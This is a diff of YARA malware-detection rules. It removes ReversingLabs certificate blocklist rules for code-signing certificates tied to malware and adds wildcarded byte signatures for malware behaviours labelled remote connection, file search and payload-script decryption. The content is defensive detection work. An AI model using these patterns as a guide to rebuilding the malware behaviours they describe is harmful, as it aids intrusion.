-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fangzhen Li" and pe.signatures [ i ] . serial == "1c:b0:6d:cc:b4:82:25:57:28:67:1e:a1:2a:c4:16:20" and 1445126399 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_370C2467C41D6019Bbecd72E00C5D73D : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "18c5d1bb-21b8-5157-a03b-8bcbdc74c0cd"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1816-L1832"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2b99522b75ee83d85b30146cb292b5a8a46dc300fb43dd9d39d9ca96c9d32d9b"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
-
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UNINFO SISTEMAS LTDA ME" and pe.signatures [ i ] . serial == "37:0c:24:67:c4:1d:60:19:bb:ec:d7:2e:00:c5:d7:3d" and 1445299199 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_5067339614C5Cc219C489D40420F3Bf9 : INFO FILE
-{
-	meta:
-		description = "The digital certificate has leaked."
-		author = "ReversingLabs"
-		id = "6e0cb6f9-0a92-5eb2-b13f-f9c4eb0ae6b1"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1834-L1850"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1716087285a093a3467583f79d7ae9bee641997227e6d4f95047905aedcc97c6"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
-
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "D-LINK CORPORATION" and pe.signatures [ i ] . serial == "50:67:33:96:14:c5:cc:21:9c:48:9d:40:42:0f:3b:f9" and 1441238400 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_6E32531Ae83992F0573120A5E78De271 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "37fc58ea-63d4-569d-968f-f4775403b0bb"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1852-L1868"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2b6d54ea8395c3666906b2e60c30b970c2c1b6f55ded874cbcc22dc79391fb34"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
-
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3 AM CHP" and pe.signatures [ i ] . serial == "6e:32:53:1a:e8:39:92:f0:57:31:20:a5:e7:8d:e2:71" and 1451606399 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_6967A89Bcf6Efef160Aaeebbff376C0A : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "d6714f50-600b-5437-8be6-097f7dd93dc7"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1870-L1886"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "deb7465e453aa5838f81e15e270abc958a65e1a6051a88a5910244edbe874451"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
-
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Chang Yucheng" and pe.signatures [ i ] . serial == "69:67:a8:9b:cf:6e:fe:f1:60:aa:ee:bb:ff:37:6c:0a" and 1451174399 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_7473D95405D2B0B3A8F28785Ce6E74Ca : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "7f44b9d8-917b-5fc4-9651-cce89358e415"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1888-L1904"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e15b990b13617017ca2d1f8caf03d8ff3785ca9b860bf11f81af5dadf17a9be5"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
-
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dmitrij Emelyanov" and pe.signatures [ i ] . serial == "74:73:d9:54:05:d2:b0:b3:a8:f2:87:85:ce:6e:74:ca" and 1453939199 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_04F380F97579F1702A85E0169Bbdfd78 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "860027ff-2df2-5519-afde-60ebee270290"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1906-L1922"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "73dc6e36fdaf5c80b33f20f2a9157805ce1d0218f3898104de16522ee9cfd51b"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
-
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GRANIFLOR" and pe.signatures [ i ] . serial == "04:f3:80:f9:75:79:f1:70:2a:85:e0:16:9b:bd:fd:78" and 1454889599 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_04D6B8Cc6Dce353Fcf3Ae8A532Be7255 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "937dd780-52f7-5f27-ac2e-a0245997d449"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1924-L1940"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a316ad7f554428d02a850fb3bb04f349d30ecd2ccd4597e7a63461bf5e866e6f"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
-
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MADERA" and pe.signatures [ i ] . serial == "04:d6:b8:cc:6d:ce:35:3f:cf:3a:e8:a5:32:be:72:55" and 1451692799 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_191322A00200F793 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "4011e54c-ca28-536f-8759-077fcce6d45f"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1942-L1958"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1b816785f86189817c124636e50a0f369ec85cfd898223c4ba43758a877f1cf3"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
-
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PRABHAKAR NARAYAN" and pe.signatures [ i ] . serial == "19:13:22:a0:02:00:f7:93" and 1442966399 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_451C9D0B413E6E8Df175 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "adc832c0-166d-52d1-aeec-2fc92ff52d02"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1960-L1976"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7c94d87f79c9add4d7bf2a63d0774449319aa56cbc631dd9b0f19ed9bb9837d4"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
-
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PRASAD UPENDRA" and pe.signatures [ i ] . serial == "45:1c:9d:0b:41:3e:6e:8d:f1:75" and 1442275199 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_03943858218F35Adb7073A6027555621 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "fbaf4c7a-5f20-57f7-b6b7-143fdbf0e5c2"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1978-L1994"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "93369d51b73591559494a48fafa5e4f7d46301ecaa379d8de70a70ac4d2d2728"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$remote_connection_1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D
+            ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ??
+            89 5D ?? 89 5D ?? 8B D9 89 55 ?? 89 45 ?? 8B 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ??
+            E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 A1 ?? ?? ?? ?? 80 38 ?? 74
+            ?? 8B CE 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 33 C0
+            89 45 ?? 33 C0 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 75 ?? B3 ?? 8D 45 ?? 50 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ??
+            ?? ?? ?? 5A 2B C2 83 C0 ?? 50 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 83 C2 ??
+            8B 45 ?? 59 E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 5A 2B C2 50 8D
+            85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ??
+            8B D0 42 8B 45 ?? 59 E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? 8B C8 49 BA ?? ?? ?? ?? 8B 45 ??
+            E8 ?? ?? ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 48 0F 8E ?? ?? ?? ??
+            6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B F8 85 FF 0F 84 ?? ??
+            ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68
+            ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 8D
+        }
+		$remote_connection_2 = {
+            45 ?? 50 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 0D ?? ??
+            ?? ?? 0D ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 50 8D 45 ?? 50 6A ?? 8B 45 ?? 50 E8 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 6A
+            ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 68 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8D 45
+            ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ??
+            ?? ?? ?? 8B C6 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? 01 45 ?? 81 7D ?? ?? ?? ?? ?? 77 ??
+            83 7D ?? ?? 75 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
+            6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B F8 85 FF
+            0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
+            ?? ?? 50 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D
+            45 ?? 50 8D 45 ?? 50 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45
+            ?? 0D ?? ?? ?? ?? 0D ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 50 8D 45 ?? 50 6A ?? 8B 45 ?? 50
+            E8 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ??
+            ?? 85 C0 74 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ??
+            ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ??
+            ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B C6 8B 55 ?? E8 ?? ?? ?? ?? 8B
+            45 ?? 01 45 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 50 E8 ?? ?? ??
+            ?? 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 3E ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
+            ?? ?? 48 0F 8E ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A
+            ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B F8
+            85 FF 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8
+            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ??
+            ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B
+        }
+		$remote_connection_3 = {
+            45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ??
+            ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B C6 8B 55 ??
+            E8 ?? ?? ?? ?? 8B 45 ?? 01 45 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 83 7D ?? ?? 75 ?? 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A ??
+            6A ?? 6A ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45
+            ?? E8 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B F8 85 FF 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ??
+            ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 57 E8 ??
+            ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B
+            45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ??
+            ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B C6 8B 55
+            ?? E8 ?? ?? ?? ?? 8B 45 ?? 01 45 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 83 7D ?? ?? 75 ?? 8B
+            45 ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10
+            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$find_files = {
+            50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 33 F6 46 81 FE ?? ?? ?? ?? 0F 87
+            ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 8D 57 ?? B9 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 07 ?? 0F 85 ?? ?? ?? ?? F6 47 ?? ?? 0F 85 ?? ??
+            ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 84 C0 75 ??
+            6A ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75
+            ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 57 53 E8 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 84 C0 0F 85 ?? ?? ?? ?? 83
+            FB ?? 74 ?? 53 E8 ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ??
+            ?? ?? 33 F6 46 81 FE ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 45
+            ?? 8D 57 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F
+            84 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 07 ?? 0F
+            84 ?? ?? ?? ?? F6 47 ?? ?? 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF 75
+            ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 84 C0 75
+            ?? 6A ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 75 ?? 68
+            ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 57 53 E8 ?? ?? ?? ?? F7 D8 1B C0
+            F7 D8 84 C0 0F 85 ?? ?? ?? ?? 83 FB ?? 74 ?? 53 E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? F7 D8 1B DB F7 DB 84 DB
+            75 ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$decrypt_payload_script = {
+            FF 75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF
+            75 ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75
+            ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ??
+            ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 8B C3 BA ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? FF 33 FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF
+            75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ??
+            ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF
+            75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ??
+            ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D
+            45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? E8
+        }
 
 	condition:
